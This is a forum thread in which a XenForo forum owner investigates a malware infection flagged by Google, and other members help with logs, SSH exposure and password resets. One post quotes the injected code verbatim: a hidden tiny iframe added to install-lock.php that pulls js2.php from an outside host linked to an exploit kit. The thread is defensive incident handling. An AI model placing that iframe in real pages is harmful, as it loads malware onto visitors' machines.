XF 1.1 Google notified me of malware infection

[chrisj]

I found a bunch of files in the js directory. The file that google warned me is called "js2.php". It just creates an iframe for js.php There are a few other files that contain data. The server is telling me the files were created by the user www-data.

I'm not really sure where to go from here, I renamed "js2.php". I am trying to track what is referencing "js2.php".

The malware uses two urls and one of them I found a blog post about on blog.dynamoo.com mentioning it as a dynamic dns being used by a Neutrino exploit kit where "malicious code is being appended to legitimate .js files on those site".

 

[LPH]

Does this help?

http://labs.sucuri.net/db/malware/malware-entry-mwmrobh1

 

[chrisj]

Does this help?

http://labs.sucuri.net/db/malware/malware-entry-mwmrobh1

Looks to have come common elements. I found one reference to js2.php.

This line was added to the top of install-lock.php:

<iframe src="http://psvitaforum.com/js/js2.php" width=2 height=2 frameborder="0"></iframe>

Now I need to find out how this all happened.

I am on a linode VPS. install-lock.php's permission is 777 however should that be a problem since I am not on a shared server?

 

[chrisj]

I have only used the root account which had a very strong password. Based these facts, how much access could the hackers have gotten?

• The only account was root with a very strong password.
• They modified install-lock.php file which was set to chmod 777.
• They created several files in the js folder.
• The rest of the data seems intact. Hopefully they did not have access the database.

install-lock.php would never be accessed by the common user so the hack would be very ineffective which leads me to believe that they did not have root access. Somehow, google was able to find out about the javascript file.

 

[arche]

If you don't mind me asking, what modules do you have loaded with your Apache config?

 

[chrisj]

I'm using an old version of nginx which I will be upgrading.

 

[arche]

no problem, was just wondering because there is Apache module injections surfacing again that kind of describe your issue.

 

[chrisj]

Should I force all users to reset their password in case the database was viewed?

 

[arche]

How are you storing the passwords?

 

[chrisj]

How are you storing the passwords?

It's how Xenforo stores them:

The passwords are stored in the xf_user_authenticate table in the database. See this file for the auth code:

library/XenForo/Authentication/Core.php

XenForo uses a salted double hash using either SHA1 OR SHA256:

sha1(sha1(password) . salt)

or:

sha256(sha256(password) . salt)

 

[Jake Bunce]

Should I force all users to reset their password in case the database was viewed?

The main concern for the forum would be admin and mod passwords. Regular accounts aren't a concern for the security of the forum, but your users might appreciate being notified about a possible breach so they can reset their passwords themselves.

 

[arche]

The main concern for the forum would be admin and mod passwords. Regular accounts aren't a concern for the security of the forum, but your users might appreciate being notified about a possible breach so they can reset their passwords themselves.

Agreed.

It's how Xenforo stores them:

ok. Just checking.

Have you noticed anything odd in your access logs or error logs on the server itself and not xenforo logs?

 

[chrisj]

I checked auth.log and noticed I have been bombarded with ssh log in attempts. I will close that down.

If install-lock.php was modified, does that mean a log in attempt was successful?

 

[AndyB]

I checked auth.log and noticed I have been bombarded with ssh log in attempts. I will close that down.

It is normal that ssh attempts are made on your sever ssh. I have a firewall that restricts ssh attempts unless they come from my IP.

 

[Jake Bunce]

If install-lock.php was modified, does that mean a log in attempt was successful?

Very likely, yes.